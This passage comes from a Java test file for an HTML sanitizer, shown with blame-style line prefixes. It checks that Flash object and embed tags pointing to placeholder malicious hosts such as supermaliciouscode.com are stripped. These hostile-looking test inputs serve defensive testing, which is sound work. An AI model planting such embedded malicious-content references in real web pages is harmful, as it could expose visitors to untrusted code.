7260f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitized(input, "");
7270f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
7280f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7290f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    String saxExpectedOutput = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\"><param name=\"allowFullScreen\" value=\"true\"><param name=\"allowscriptaccess\" value=\"always\"><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>";
7300f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
7310f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(input, saxExpectedOutput);
7320f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    } else {
7330f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitized(input, "");
7340f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
7350f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7360f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // now what if someone sticks malicious URL in the value of the
7370f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // value attribute in the param tag? remove that param tag
7380f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    input = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://supermaliciouscode.com/badstuff.swf\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>";
7390f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    expectedOutput = "<object height=\"340\" width=\"560\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><embed allowfullscreen=\"true\" allowscriptaccess=\"always\" height=\"340\" src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\" type=\"application/x-shockwave-flash\" width=\"560\" /></object>";
7400f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    saxExpectedOutput = "<object width=\"560\" height=\"340\"><param name=\"allowFullScreen\" value=\"true\"><param name=\"allowscriptaccess\" value=\"always\"><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>";
7410f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
7420f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(input, expectedOutput);
7430f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    } else {
7440f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitized(input, "");
7450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
7460f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7470f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
7480f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertTrue(sanitize(input).equals(saxExpectedOutput));
7490f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    } else {
7500f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitized(input, "");
7510f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
7520f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7530f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // now what if someone sticks malicious URL in the value of the src
7540f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // attribute in the embed tag? remove that embed tag
7550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    input = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://hereswhereikeepbadcode.com/ohnoscary.swf\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>";
7560f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    expectedOutput = "<object height=\"340\" width=\"560\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\" /><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /></object>";
7570f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    saxExpectedOutput = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\"><param name=\"allowFullScreen\" value=\"true\"><param name=\"allowscriptaccess\" value=\"always\"></object>";
7580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7590f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
7600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(input, expectedOutput);
7610f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    } else {
7620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitized(input, "");
7630f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
7640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7650f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
7660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(input, saxExpectedOutput);
7670f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    } else {
7680f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitized(input, "");
7690f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
7700f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
7710f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7720f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
773be666032a113a8af92bc557add8e83579cf0ef5cmikesamuel  private static void assertSanitizedDoesNotContain(
7744e867904c8295537803c1c8a076e130df5674b58mikesamuel      String html, String dangerousContent) {
7750f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    String sanitized = sanitize(html);
7760f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    int index = Strings.toLowerCase(sanitized).indexOf(
7770f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        Strings.toLowerCase(dangerousContent));
7780f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertEquals(
7790f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        "`" + sanitized + "` from `" + html + "` contains `" +
7800f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        dangerousContent + "`",
7810f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        -1, index);
7820f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
7830f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
784be666032a113a8af92bc557add8e83579cf0ef5cmikesamuel  private static void assertSanitizedDoesContain(
7854e867904c8295537803c1c8a076e130df5674b58mikesamuel      String html, String dangerousContent) {
7860f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    String sanitized = sanitize(html);
7870f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    int index = Strings.toLowerCase(sanitized).indexOf(
7880f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        Strings.toLowerCase(dangerousContent));
7890f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertTrue(
7900f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        "`" + sanitized + "` from `" + html + "` does not contain `" +
7910f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        dangerousContent + "`",
7920f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        index >= 0);
7930f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
7940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
795be666032a113a8af92bc557add8e83579cf0ef5cmikesamuel  private static void assertSanitized(String html, String sanitized) {
7960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertEquals(sanitized, sanitize(html));
7970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
798d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel
799d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel  private static String guessCharsetFromContentType(String contentType) {
800d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel    Matcher m = Pattern.compile(";\\s*charset=(?:\"([^\"]*)\"|([^\\s;]*))")
801d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel      .matcher(contentType);
802d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel    if (m.find()) {
803d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel      String ct;
804d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel      ct = m.group(1);
805d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel      if (ct != null) { return ct; }
806d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel      ct = m.group(2);
807d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel      if (ct != null) { return ct; }
808d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel    }
809d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel    return "UTF-8";
810d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel  }
811afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com}